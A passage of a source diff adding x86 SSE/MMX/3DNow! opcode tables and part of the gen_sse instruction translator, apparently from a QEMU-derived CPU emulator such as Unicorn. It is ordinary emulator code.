gen_helper_pfrsqrt, + {0},{0}, // filler: 0x98 - 0x99 + gen_helper_pfsub, + {0},{0},{0}, // filler: 0x9b - 0x9d + gen_helper_pfadd, + {0}, // filler: 0x9f + gen_helper_pfcmpgt, + {0},{0},{0}, // filler: 0xa1 - 0xa3 + gen_helper_pfmax, + {0}, // filler: 0xa5 + gen_helper_movq, /* pfrcpit1; no need to actually increase precision */ + gen_helper_movq, /* pfrsqit1 */ + {0},{0}, // filler: 0xa8 - 0xa9 + gen_helper_pfsubr, + {0},{0},{0}, // filler: 0xab - 0xad + gen_helper_pfacc, + {0}, // filler: 0xaf + gen_helper_pfcmpeq, + {0},{0},{0}, // filler: 0xb1 - 0xb3 + gen_helper_pfmul, + {0}, // filler: 0xb5 + gen_helper_movq, /* pfrcpit2 */ + gen_helper_pmulhrw_mmx, + {0},{0},{0}, // filler: 0xb8 - 0xba + gen_helper_pswapd, + {0},{0},{0}, // filler: 0xbc - 0xbe + gen_helper_pavgb_mmx, /* pavgusb */ + // filler: 0xc0 - 0xff + {0},{0},{0},{0},{0},{0},{0},{0}, {0},{0},{0},{0},{0},{0},{0},{0}, + {0},{0},{0},{0},{0},{0},{0},{0}, {0},{0},{0},{0},{0},{0},{0},{0}, + {0},{0},{0},{0},{0},{0},{0},{0}, {0},{0},{0},{0},{0},{0},{0},{0}, + 
{0},{0},{0},{0},{0},{0},{0},{0}, {0},{0},{0},{0},{0},{0},{0},{0}, +#else + [0x0c] = gen_helper_pi2fw, + [0x0d] = gen_helper_pi2fd, + [0x1c] = gen_helper_pf2iw, + [0x1d] = gen_helper_pf2id, + [0x8a] = gen_helper_pfnacc, + [0x8e] = gen_helper_pfpnacc, + [0x90] = gen_helper_pfcmpge, + [0x94] = gen_helper_pfmin, + [0x96] = gen_helper_pfrcp, + [0x97] = gen_helper_pfrsqrt, + [0x9a] = gen_helper_pfsub, + [0x9e] = gen_helper_pfadd, + [0xa0] = gen_helper_pfcmpgt, + [0xa4] = gen_helper_pfmax, + [0xa6] = gen_helper_movq, /* pfrcpit1; no need to actually increase precision */ + [0xa7] = gen_helper_movq, /* pfrsqit1 */ + [0xaa] = gen_helper_pfsubr, + [0xae] = gen_helper_pfacc, + [0xb0] = gen_helper_pfcmpeq, + [0xb4] = gen_helper_pfmul, + [0xb6] = gen_helper_movq, /* pfrcpit2 */ + [0xb7] = gen_helper_pmulhrw_mmx, + [0xbb] = gen_helper_pswapd, + [0xbf] = gen_helper_pavgb_mmx /* pavgusb */ +#endif +}; + +struct SSEOpHelper_epp { + SSEFunc_0_epp op[2]; + uint32_t ext_mask; +}; + +struct SSEOpHelper_eppi { + SSEFunc_0_eppi op[2]; + uint32_t ext_mask; +}; + +#define SSSE3_OP(x) { MMX_OP2(x), CPUID_EXT_SSSE3 } +#define SSE41_OP(x) { { NULL, gen_helper_ ## x ## _xmm }, CPUID_EXT_SSE41 } +#define SSE42_OP(x) { { NULL, gen_helper_ ## x ## _xmm }, CPUID_EXT_SSE42 } +#define SSE41_SPECIAL { { NULL, SSE_SPECIAL }, CPUID_EXT_SSE41 } +#define PCLMULQDQ_OP(x) { { NULL, gen_helper_ ## x ## _xmm }, \ + CPUID_EXT_PCLMULQDQ } +#define AESNI_OP(x) { { NULL, gen_helper_ ## x ## _xmm }, CPUID_EXT_AES } + +static const struct SSEOpHelper_epp sse_op_table6[256] = { + SSSE3_OP(pshufb), + SSSE3_OP(phaddw), + SSSE3_OP(phaddd), + SSSE3_OP(phaddsw), + SSSE3_OP(pmaddubsw), + SSSE3_OP(phsubw), + SSSE3_OP(phsubd), + SSSE3_OP(phsubsw), + SSSE3_OP(psignb), + SSSE3_OP(psignw), + SSSE3_OP(psignd), + SSSE3_OP(pmulhrsw), + {{0},0},{{0},0},{{0},0},{{0},0}, // filler: 0x0c - 0x0f + SSE41_OP(pblendvb), + {{0},0},{{0},0},{{0},0}, // filler: 0x11 - 0x13 + SSE41_OP(blendvps), + SSE41_OP(blendvpd), + {{0},0}, // filler: 
0x16 + SSE41_OP(ptest), + {{0},0},{{0},0},{{0},0},{{0},0}, // filler: 0x18 - 0x1b + SSSE3_OP(pabsb), + SSSE3_OP(pabsw), + SSSE3_OP(pabsd), + {{0},0}, // filler: 0x1f + SSE41_OP(pmovsxbw), + SSE41_OP(pmovsxbd), + SSE41_OP(pmovsxbq), + SSE41_OP(pmovsxwd), + SSE41_OP(pmovsxwq), + SSE41_OP(pmovsxdq), + {{0},0},{{0},0}, // filler: 0x26 - 0x27 + SSE41_OP(pmuldq), + SSE41_OP(pcmpeqq), + SSE41_SPECIAL, /* movntqda */ + SSE41_OP(packusdw), + {{0},0},{{0},0},{{0},0},{{0},0}, // filler: 0x2c - 0x2f + SSE41_OP(pmovzxbw), + SSE41_OP(pmovzxbd), + SSE41_OP(pmovzxbq), + SSE41_OP(pmovzxwd), + SSE41_OP(pmovzxwq), + SSE41_OP(pmovzxdq), + {{0},0}, // filler: 0x36 + SSE42_OP(pcmpgtq), + SSE41_OP(pminsb), + SSE41_OP(pminsd), + SSE41_OP(pminuw), + SSE41_OP(pminud), + SSE41_OP(pmaxsb), + SSE41_OP(pmaxsd), + SSE41_OP(pmaxuw), + SSE41_OP(pmaxud), + SSE41_OP(pmulld), + SSE41_OP(phminposuw), + // filler: 0x42 - 0xda + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, + 
{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0}, + AESNI_OP(aesimc), + AESNI_OP(aesenc), + AESNI_OP(aesenclast), + AESNI_OP(aesdec), + AESNI_OP(aesdeclast), + // filler: 0xe0 - 0xff + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, +}; + +static const struct SSEOpHelper_eppi sse_op_table7[256] = { +#ifdef _MSC_VER + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, // filler: 0x00 - 0x07 + SSE41_OP(roundps), + SSE41_OP(roundpd), + SSE41_OP(roundss), + SSE41_OP(roundsd), + SSE41_OP(blendps), + SSE41_OP(blendpd), + SSE41_OP(pblendw), + SSSE3_OP(palignr), + {{0},0},{{0},0},{{0},0},{{0},0}, // filler: 0x10 - 0x13 + SSE41_SPECIAL, /* pextrb */ + SSE41_SPECIAL, /* pextrw */ + SSE41_SPECIAL, /* pextrd/pextrq */ + SSE41_SPECIAL, /* extractps */ + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, // filler: 0x18 - 0x1f + SSE41_SPECIAL, /* pinsrb */ + SSE41_SPECIAL, /* insertps */ + SSE41_SPECIAL, /* pinsrd/pinsrq */ + // filler: 0x23 - 0x3f + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, + SSE41_OP(dpps), + SSE41_OP(dppd), + SSE41_OP(mpsadbw), + {{0},0}, // filler: 0x43 + PCLMULQDQ_OP(pclmulqdq), + // filler: 0x45 - 0x5f + {{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, + SSE42_OP(pcmpestrm), + 
SSE42_OP(pcmpestri), + SSE42_OP(pcmpistrm), + SSE42_OP(pcmpistri), + // filler: 0x64 - 0xde + {{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, + AESNI_OP(aeskeygenassist), + // filler: 0xe0 - 0xff + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, +#else + [0x08] = SSE41_OP(roundps), + [0x09] = SSE41_OP(roundpd), + [0x0a] = SSE41_OP(roundss), + [0x0b] = SSE41_OP(roundsd), + [0x0c] = SSE41_OP(blendps), + [0x0d] = SSE41_OP(blendpd), + [0x0e] = SSE41_OP(pblendw), + [0x0f] = SSSE3_OP(palignr), + [0x14] = SSE41_SPECIAL, /* pextrb */ + [0x15] = SSE41_SPECIAL, /* pextrw */ + [0x16] = SSE41_SPECIAL, /* pextrd/pextrq */ + [0x17] = SSE41_SPECIAL, /* extractps */ + [0x20] = SSE41_SPECIAL, /* pinsrb */ + [0x21] = SSE41_SPECIAL, /* insertps */ + [0x22] = SSE41_SPECIAL, /* pinsrd/pinsrq */ + [0x40] = SSE41_OP(dpps), + 
[0x41] = SSE41_OP(dppd), + [0x42] = SSE41_OP(mpsadbw), + [0x44] = PCLMULQDQ_OP(pclmulqdq), + [0x60] = SSE42_OP(pcmpestrm), + [0x61] = SSE42_OP(pcmpestri), + [0x62] = SSE42_OP(pcmpistrm), + [0x63] = SSE42_OP(pcmpistri), + [0xdf] = AESNI_OP(aeskeygenassist), +#endif +}; + +static void gen_sse(CPUX86State *env, DisasContext *s, int b, + target_ulong pc_start, int rex_r) +{ + int b1, op1_offset, op2_offset, is_xmm, val; + int modrm, mod, rm, reg; + SSEFunc_0_epp sse_fn_epp; + SSEFunc_0_eppi sse_fn_eppi; + SSEFunc_0_ppi sse_fn_ppi; + SSEFunc_0_eppt sse_fn_eppt; + TCGMemOp ot; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_ptr cpu_env = tcg_ctx->cpu_env; + TCGv_ptr cpu_ptr0 = tcg_ctx->cpu_ptr0; + TCGv_ptr cpu_ptr1 = tcg_ctx->cpu_ptr1; + TCGv_i32 cpu_tmp2_i32 = tcg_ctx->cpu_tmp2_i32; + TCGv_i32 cpu_tmp3_i32 = tcg_ctx->cpu_tmp3_i32; + TCGv_i64 cpu_tmp1_i64 = tcg_ctx->cpu_tmp1_i64; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv cpu_cc_dst = *(TCGv *)tcg_ctx->cpu_cc_dst; + TCGv cpu_cc_src = *(TCGv *)tcg_ctx->cpu_cc_src; + TCGv cpu_cc_src2 = *(TCGv *)tcg_ctx->cpu_cc_src2; + TCGv cpu_tmp0 = *(TCGv *)tcg_ctx->cpu_tmp0; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + TCGv **cpu_regs = (TCGv **)tcg_ctx->cpu_regs; + + b &= 0xff; + if (s->prefix & PREFIX_DATA) + b1 = 1; + else if (s->prefix & PREFIX_REPZ) + b1 = 2; + else if (s->prefix & PREFIX_REPNZ) + b1 = 3; + else + b1 = 0; + sse_fn_epp = sse_op_table1[b][b1]; + if (!sse_fn_epp) { + goto illegal_op; + } + if ((b <= 0x5f && b >= 0x10) || b == 0xc6 || b == 0xc2) { + is_xmm = 1; + } else { + if (b1 == 0) { + /* MMX case */ + is_xmm = 0; + } else { + is_xmm = 1; + } + } + /* simple MMX/SSE operation */ + if (s->flags & HF_TS_MASK) { + gen_exception(s, EXCP07_PREX, pc_start - s->cs_base); + return; + } + if (s->flags & HF_EM_MASK) { + illegal_op: + gen_exception(s, EXCP06_ILLOP, pc_start - s->cs_base); + return; + } + if (is_xmm && !(s->flags & HF_OSFXSR_MASK)) + if ((b != 0x38 && b != 0x3a) || (s->prefix & PREFIX_DATA)) + goto 
illegal_op; + if (b == 0x0e) { + if (!(s->cpuid_ext2_features & CPUID_EXT2_3DNOW)) + goto illegal_op; + /* femms */ + gen_helper_emms(tcg_ctx, cpu_env); + return; + } + if (b == 0x77) { + /* emms */ + gen_helper_emms(tcg_ctx, cpu_env); + return; + } + /* prepare MMX state (XXX: optimize by storing fptt and fptags in + the static cpu state) */ + if (!is_xmm) { + gen_helper_enter_mmx(tcg_ctx, cpu_env); + } + + modrm = cpu_ldub_code(env, s->pc++); + reg = ((modrm >> 3) & 7); + if (is_xmm) + reg |= rex_r; + mod = (modrm >> 6) & 3; + if (sse_fn_epp == SSE_SPECIAL) { + b |= (b1 << 8); + switch(b) { + case 0x0e7: /* movntq */ + if (mod == 3) + goto illegal_op; + gen_lea_modrm(env, s, modrm); + gen_stq_env_A0(s, offsetof(CPUX86State, fpregs[reg].mmx)); + break; + case 0x1e7: /* movntdq */ + case 0x02b: /* movntps */ + case 0x12b: /* movntps */ + if (mod == 3) + goto illegal_op; + gen_lea_modrm(env, s, modrm); + gen_sto_env_A0(s, offsetof(CPUX86State, xmm_regs[reg])); + break; + case 0x3f0: /* lddqu */ + if (mod == 3) + goto illegal_op; + gen_lea_modrm(env, s, modrm); + gen_ldo_env_A0(s, offsetof(CPUX86State, xmm_regs[reg])); + break; + case 0x22b: /* movntss */ + case 0x32b: /* movntsd */ + if (mod == 3) + goto illegal_op; + gen_lea_modrm(env, s, modrm); + if (b1 & 1) { + gen_stq_env_A0(s, offsetof(CPUX86State, + xmm_regs[reg].XMM_Q(0))); + } else { + tcg_gen_ld32u_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State, + xmm_regs[reg].XMM_L(0))); + gen_op_st_v(s, MO_32, *cpu_T[0], cpu_A0); + } + break; + case 0x6e: /* movd mm, ea */ +#ifdef TARGET_X86_64 + if (s->dflag == MO_64) { + gen_ldst_modrm(env, s, modrm, MO_64, OR_TMP0, 0); + tcg_gen_st_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State,fpregs[reg].mmx)); + } else +#endif + { + gen_ldst_modrm(env, s, modrm, MO_32, OR_TMP0, 0); + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr0, cpu_env, + offsetof(CPUX86State,fpregs[reg].mmx)); + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_T[0]); + gen_helper_movl_mm_T0_mmx(tcg_ctx, 
cpu_ptr0, cpu_tmp2_i32); + } + break; + case 0x16e: /* movd xmm, ea */ +#ifdef TARGET_X86_64 + if (s->dflag == MO_64) { + gen_ldst_modrm(env, s, modrm, MO_64, OR_TMP0, 0); + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr0, cpu_env, + offsetof(CPUX86State,xmm_regs[reg])); + gen_helper_movq_mm_T0_xmm(tcg_ctx, cpu_ptr0, *cpu_T[0]); + } else +#endif + { + gen_ldst_modrm(env, s, modrm, MO_32, OR_TMP0, 0); + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr0, cpu_env, + offsetof(CPUX86State,xmm_regs[reg])); + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_T[0]); + gen_helper_movl_mm_T0_xmm(tcg_ctx, cpu_ptr0, cpu_tmp2_i32); + } + break; + case 0x6f: /* movq mm, ea */ + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + gen_ldq_env_A0(s, offsetof(CPUX86State, fpregs[reg].mmx)); + } else { + rm = (modrm & 7); + tcg_gen_ld_i64(tcg_ctx, cpu_tmp1_i64, cpu_env, + offsetof(CPUX86State,fpregs[rm].mmx)); + tcg_gen_st_i64(tcg_ctx, cpu_tmp1_i64, cpu_env, + offsetof(CPUX86State,fpregs[reg].mmx)); + } + break; + case 0x010: /* movups */ + case 0x110: /* movupd */ + case 0x028: /* movaps */ + case 0x128: /* movapd */ + case 0x16f: /* movdqa xmm, ea */ + case 0x26f: /* movdqu xmm, ea */ + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + gen_ldo_env_A0(s, offsetof(CPUX86State, xmm_regs[reg])); + } else { + rm = (modrm & 7) | REX_B(s); + gen_op_movo(tcg_ctx, offsetof(CPUX86State,xmm_regs[reg]), + offsetof(CPUX86State,xmm_regs[rm])); + } + break; + case 0x210: /* movss xmm, ea */ + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + gen_op_ld_v(s, MO_32, *cpu_T[0], cpu_A0); + tcg_gen_st32_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State,xmm_regs[reg].XMM_L(0))); + tcg_gen_movi_tl(tcg_ctx, *cpu_T[0], 0); + tcg_gen_st32_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State,xmm_regs[reg].XMM_L(1))); + tcg_gen_st32_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State,xmm_regs[reg].XMM_L(2))); + tcg_gen_st32_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State,xmm_regs[reg].XMM_L(3))); + } else { + rm = (modrm & 7) | 
REX_B(s); + gen_op_movl(tcg_ctx, offsetof(CPUX86State,xmm_regs[reg].XMM_L(0)), + offsetof(CPUX86State,xmm_regs[rm].XMM_L(0))); + } + break; + case 0x310: /* movsd xmm, ea */ + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + gen_ldq_env_A0(s, offsetof(CPUX86State, + xmm_regs[reg].XMM_Q(0))); + tcg_gen_movi_tl(tcg_ctx, *cpu_T[0], 0); + tcg_gen_st32_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State,xmm_regs[reg].XMM_L(2))); + tcg_gen_st32_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State,xmm_regs[reg].XMM_L(3))); + } else { + rm = (modrm & 7) | REX_B(s); + gen_op_movq(tcg_ctx, offsetof(CPUX86State,xmm_regs[reg].XMM_Q(0)), + offsetof(CPUX86State,xmm_regs[rm].XMM_Q(0))); + } + break; + case 0x012: /* movlps */ + case 0x112: /* movlpd */ + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + gen_ldq_env_A0(s, offsetof(CPUX86State, + xmm_regs[reg].XMM_Q(0))); + } else { + /* movhlps */ + rm = (modrm & 7) | REX_B(s); + gen_op_movq(tcg_ctx, offsetof(CPUX86State,xmm_regs[reg].XMM_Q(0)), + offsetof(CPUX86State,xmm_regs[rm].XMM_Q(1))); + } + break; + case 0x212: /* movsldup */ + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + gen_ldo_env_A0(s, offsetof(CPUX86State, xmm_regs[reg])); + } else { + rm = (modrm & 7) | REX_B(s); + gen_op_movl(tcg_ctx, offsetof(CPUX86State,xmm_regs[reg].XMM_L(0)), + offsetof(CPUX86State,xmm_regs[rm].XMM_L(0))); + gen_op_movl(tcg_ctx, offsetof(CPUX86State,xmm_regs[reg].XMM_L(2)), + offsetof(CPUX86State,xmm_regs[rm].XMM_L(2))); + } + gen_op_movl(tcg_ctx, offsetof(CPUX86State,xmm_regs[reg].XMM_L(1)), + offsetof(CPUX86State,xmm_regs[reg].XMM_L(0))); + gen_op_movl(tcg_ctx, offsetof(CPUX86State,xmm_regs[reg].XMM_L(3)), + offsetof(CPUX86State,xmm_regs[reg].XMM_L(2))); + break; + case 0x312: /* movddup */ + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + gen_ldq_env_A0(s, offsetof(CPUX86State, + xmm_regs[reg].XMM_Q(0))); + } else { + rm = (modrm & 7) | REX_B(s); + gen_op_movq(tcg_ctx, offsetof(CPUX86State,xmm_regs[reg].XMM_Q(0)), + 
offsetof(CPUX86State,xmm_regs[rm].XMM_Q(0))); + } + gen_op_movq(tcg_ctx, offsetof(CPUX86State,xmm_regs[reg].XMM_Q(1)), + offsetof(CPUX86State,xmm_regs[reg].XMM_Q(0))); + break; + case 0x016: /* movhps */ + case 0x116: /* movhpd */ + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + gen_ldq_env_A0(s, offsetof(CPUX86State, + xmm_regs[reg].XMM_Q(1))); + } else { + /* movlhps */ + rm = (modrm & 7) | REX_B(s); + gen_op_movq(tcg_ctx, offsetof(CPUX86State,xmm_regs[reg].XMM_Q(1)), + offsetof(CPUX86State,xmm_regs[rm].XMM_Q(0))); + } + break; + case 0x216: /* movshdup */ + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + gen_ldo_env_A0(s, offsetof(CPUX86State, xmm_regs[reg])); + } else { + rm = (modrm & 7) | REX_B(s); + gen_op_movl(tcg_ctx, offsetof(CPUX86State,xmm_regs[reg].XMM_L(1)), + offsetof(CPUX86State,xmm_regs[rm].XMM_L(1))); + gen_op_movl(tcg_ctx, offsetof(CPUX86State,xmm_regs[reg].XMM_L(3)), + offsetof(CPUX86State,xmm_regs[rm].XMM_L(3))); + } + gen_op_movl(tcg_ctx, offsetof(CPUX86State,xmm_regs[reg].XMM_L(0)), + offsetof(CPUX86State,xmm_regs[reg].XMM_L(1))); + gen_op_movl(tcg_ctx, offsetof(CPUX86State,xmm_regs[reg].XMM_L(2)), + offsetof(CPUX86State,xmm_regs[reg].XMM_L(3))); + break; + case 0x178: + case 0x378: + { + int bit_index, field_length; + + if (b1 == 1 && reg != 0) + goto illegal_op; + field_length = cpu_ldub_code(env, s->pc++) & 0x3F; + bit_index = cpu_ldub_code(env, s->pc++) & 0x3F; + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr0, cpu_env, + offsetof(CPUX86State,xmm_regs[reg])); + if (b1 == 1) + gen_helper_extrq_i(tcg_ctx, cpu_env, cpu_ptr0, + tcg_const_i32(tcg_ctx, bit_index), + tcg_const_i32(tcg_ctx, field_length)); + else + gen_helper_insertq_i(tcg_ctx, cpu_env, cpu_ptr0, + tcg_const_i32(tcg_ctx, bit_index), + tcg_const_i32(tcg_ctx, field_length)); + } + break; + case 0x7e: /* movd ea, mm */ +#ifdef TARGET_X86_64 + if (s->dflag == MO_64) { + tcg_gen_ld_i64(tcg_ctx, *cpu_T[0], cpu_env, + offsetof(CPUX86State,fpregs[reg].mmx)); + gen_ldst_modrm(env, s, modrm, 
MO_64, OR_TMP0, 1); + } else +#endif + { + tcg_gen_ld32u_tl(tcg_ctx, *cpu_T[0], cpu_env, + offsetof(CPUX86State,fpregs[reg].mmx.MMX_L(0))); + gen_ldst_modrm(env, s, modrm, MO_32, OR_TMP0, 1); + } + break; + case 0x17e: /* movd ea, xmm */ +#ifdef TARGET_X86_64 + if (s->dflag == MO_64) { + tcg_gen_ld_i64(tcg_ctx, *cpu_T[0], cpu_env, + offsetof(CPUX86State,xmm_regs[reg].XMM_Q(0))); + gen_ldst_modrm(env, s, modrm, MO_64, OR_TMP0, 1); + } else +#endif + { + tcg_gen_ld32u_tl(tcg_ctx, *cpu_T[0], cpu_env, + offsetof(CPUX86State,xmm_regs[reg].XMM_L(0))); + gen_ldst_modrm(env, s, modrm, MO_32, OR_TMP0, 1); + } + break; + case 0x27e: /* movq xmm, ea */ + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + gen_ldq_env_A0(s, offsetof(CPUX86State, + xmm_regs[reg].XMM_Q(0))); + } else { + rm = (modrm & 7) | REX_B(s); + gen_op_movq(tcg_ctx, offsetof(CPUX86State,xmm_regs[reg].XMM_Q(0)), + offsetof(CPUX86State,xmm_regs[rm].XMM_Q(0))); + } + gen_op_movq_env_0(tcg_ctx, offsetof(CPUX86State,xmm_regs[reg].XMM_Q(1))); + break; + case 0x7f: /* movq ea, mm */ + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + gen_stq_env_A0(s, offsetof(CPUX86State, fpregs[reg].mmx)); + } else { + rm = (modrm & 7); + gen_op_movq(tcg_ctx, offsetof(CPUX86State,fpregs[rm].mmx), + offsetof(CPUX86State,fpregs[reg].mmx)); + } + break; + case 0x011: /* movups */ + case 0x111: /* movupd */ + case 0x029: /* movaps */ + case 0x129: /* movapd */ + case 0x17f: /* movdqa ea, xmm */ + case 0x27f: /* movdqu ea, xmm */ + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + gen_sto_env_A0(s, offsetof(CPUX86State, xmm_regs[reg])); + } else { + rm = (modrm & 7) | REX_B(s); + gen_op_movo(tcg_ctx, offsetof(CPUX86State,xmm_regs[rm]), + offsetof(CPUX86State,xmm_regs[reg])); + } + break; + case 0x211: /* movss ea, xmm */ + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + tcg_gen_ld32u_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State,xmm_regs[reg].XMM_L(0))); + gen_op_st_v(s, MO_32, *cpu_T[0], cpu_A0); + } else { + rm = (modrm & 
7) | REX_B(s); + gen_op_movl(tcg_ctx, offsetof(CPUX86State,xmm_regs[rm].XMM_L(0)), + offsetof(CPUX86State,xmm_regs[reg].XMM_L(0))); + } + break; + case 0x311: /* movsd ea, xmm */ + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + gen_stq_env_A0(s, offsetof(CPUX86State, + xmm_regs[reg].XMM_Q(0))); + } else { + rm = (modrm & 7) | REX_B(s); + gen_op_movq(tcg_ctx, offsetof(CPUX86State,xmm_regs[rm].XMM_Q(0)), + offsetof(CPUX86State,xmm_regs[reg].XMM_Q(0))); + } + break; + case 0x013: /* movlps */ + case 0x113: /* movlpd */ + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + gen_stq_env_A0(s, offsetof(CPUX86State, + xmm_regs[reg].XMM_Q(0))); + } else { + goto illegal_op; + } + break; + case 0x017: /* movhps */ + case 0x117: /* movhpd */ + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + gen_stq_env_A0(s, offsetof(CPUX86State, + xmm_regs[reg].XMM_Q(1))); + } else { + goto illegal_op; + } + break; + case 0x71: /* shift mm, im */ + case 0x72: + case 0x73: + case 0x171: /* shift xmm, im */ + case 0x172: + case 0x173: + if (b1 >= 2) { + goto illegal_op; + } + val = cpu_ldub_code(env, s->pc++); + if (is_xmm) { + tcg_gen_movi_tl(tcg_ctx, *cpu_T[0], val); + tcg_gen_st32_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State,xmm_t0.XMM_L(0))); + tcg_gen_movi_tl(tcg_ctx, *cpu_T[0], 0); + tcg_gen_st32_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State,xmm_t0.XMM_L(1))); + op1_offset = offsetof(CPUX86State,xmm_t0); + } else { + 